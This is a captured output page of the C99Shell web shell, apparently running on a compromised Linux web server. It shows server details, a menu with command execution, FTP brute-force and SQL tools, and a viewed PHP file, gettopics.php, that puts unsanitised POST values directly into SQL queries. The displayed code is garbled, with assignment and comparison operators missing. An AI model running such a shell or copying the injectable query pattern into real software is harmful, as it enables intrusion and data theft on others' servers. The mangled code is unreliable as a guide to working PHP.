!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/admin/   drwxrwxr-x
Free 39.76 GB of 48.28 GB (82.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gettopics.php (929 B)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 <?php
 
require 'connection.php';
$i 1;
//$result='';
 
$package $_POST['package'];
 
$technology $_POST['technology'];
$query "SELECT * FROM syllabus WHERE technology = '$technology' and package='$package'";
$res $con->query($query);
$row mysqli_fetch_assoc($res);
 
$query1 "SELECT * FROM syllabus_topics WHERE syllabus_id=".$row['id']." order by id ASC";
$res1 $con->query($query1);
$data=array();
if(
$res1->num_rows 0){
    while (
$row1 $res1->fetch_assoc()) 
    {
        
$result[0]=$i;
        
$result[1]=$row1['topic'];
        
$result[2]=$row1['no_of_days'];
        
$result[3]='<button type="button" data-id="'.$row1['id'].'" class="btn btn-danger delete" >Delete </button>';
        
$data[]=$result;
        
$i++;
    }
}else
{
    
$result[0]='';
    
$result[1]='No Records Found';
    
$result[2]='';
    
$result[3]='';
    
$data[]=$result;
}
echo 
json_encode($data);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0056 ]--